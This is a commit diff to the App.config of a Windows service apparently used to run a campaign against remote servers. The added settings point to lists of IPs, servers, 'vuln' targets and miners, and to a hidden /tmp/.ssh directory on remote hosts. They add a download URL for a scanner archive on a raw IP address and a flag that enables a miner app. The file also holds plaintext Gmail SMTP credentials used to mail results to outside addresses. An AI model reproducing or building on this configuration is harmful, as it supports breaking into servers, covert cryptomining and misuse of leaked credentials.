Integrated MinerCheck , updated Download File if not exist

--- a/SmtpWindowsService/App.config
+++ b/SmtpWindowsService/App.config
@@ -4,20 +4,37 @@
         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
     </startup>
   <appSettings>
+    
     <!--Files and Directories-->
     <add key="IPs" value="D:\VSProjects\SmtpWindowsService\SmtpWindowsService/Documents/IP.txt"/>
     <add key="LineCount" value="D:\VSProjects\SmtpWindowsService\SmtpWindowsService/Documents/LineCount.txt"/>
     <add key="Servers" value="D:\VSProjects\SmtpWindowsService\SmtpWindowsService/Documents/servers.txt"/>
+    <add key="Miners" value="D:\VSProjects\SmtpWindowsService\SmtpWindowsService/Documents/miners.txt"/>
     <add key="vulnLocal" value="D:\VSProjects\SmtpWindowsService\SmtpWindowsService/Documents/vuln.txt"/>
-    <add key="remoteSmtpDirectory" value="/tmp/.ssh/Smtp"/>
     <add key="localDestinatonForTempVuln" value="D:\VSProjects\SmtpWindowsService\SmtpWindowsService/Documents/TempFile.txt"/>
 
     <!--Smtp Email Settings-->
     <add key="EmailFrom" value="kaker007@gmail.com"/>
     <add key="EmailTo" value="matolinka@yahoo.com"/>
+    <add key="EmailToAdd" value="babi_kakers@yahoo.com"/>
     <add key="SmtpServer" value="smtp.gmail.com"/>
     <add key="SmtpUsername" value="kaker007@gmail.com"/>
     <add key="SmtpPassword" value="aspirine#123"/>
     <add key="SmtpPort" value="465"/>
+
+    <!--Remote Host Settings-->
+    <add key="remoteSmtpDirectory" value="/tmp/.ssh/Smtp"/>
+    <add key="remoteDefaultDirectory" value="/tmp/.ssh"/>
+    <add key="downloadScanner" value="http://187.185.15.134/Smtp.zip"/>
+    <add key="downloadHost" value="http://187.185.15.134"/>
+
+    <!--Timer Settings-->
+    <!--<add key="TimerInterval" value="60000"/>-->
+    <add key="TimerInterval" value="180000"/>
+    <!--<add key="TimerInterval" value="28800000"/>-->
+    
+    <!--Applications Settings-->
+    <add key="MinerAppEnabled" value="true"/>
+    
   </appSettings>
 </configuration>
